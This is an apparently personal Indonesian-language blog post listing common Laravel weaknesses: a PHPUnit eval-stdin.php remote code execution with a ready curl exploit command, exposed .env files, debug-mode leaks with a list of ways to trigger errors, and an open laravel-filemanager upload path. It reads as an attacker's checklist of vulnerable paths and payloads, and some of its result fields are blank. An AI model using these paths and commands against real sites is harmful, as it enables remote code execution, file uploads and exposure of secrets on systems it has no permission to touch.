Categories
Story

Common Bug Pada Laravel

Sebelumnya saya berterima kasih kepada mas Ade pemilik blog nakanosec.com

Laravel Phpunit RCE (Remote Code Execution)

Vulnerable path: /phpunit/src/Util/PHP/eval.stdin.php
Vuln Indicator: Blank Page

Exploit: curl -d “<?php echo php_uname(); ?>” http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Respond:

Laravel dot env (Laravel Environment)

Impact: Sensitive Information Exposure
Vuln Indicator:

Laravel App Debug

Impact: Sensitive Information Exposure (Path,.env conf)
Cara Men-Trigger:
1.Gunakan Query/String SQL Injection pada post dan get data
2.Masukkan path /logout (ex:site.com/logout)
3.Menggunakan Buffer Overflow pada form/urlĀ  (ex:site/xxxxxxxxx/)
4.Menambahkan [] pada parameter yang ada (bisa post atau get)

Laravel File Manager

Impact: Arbitary File Uploads
Vulnerable path: /laravel-filemanager/

Thanks to : Nakanosec.com & Ade Little

-William Laurent

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.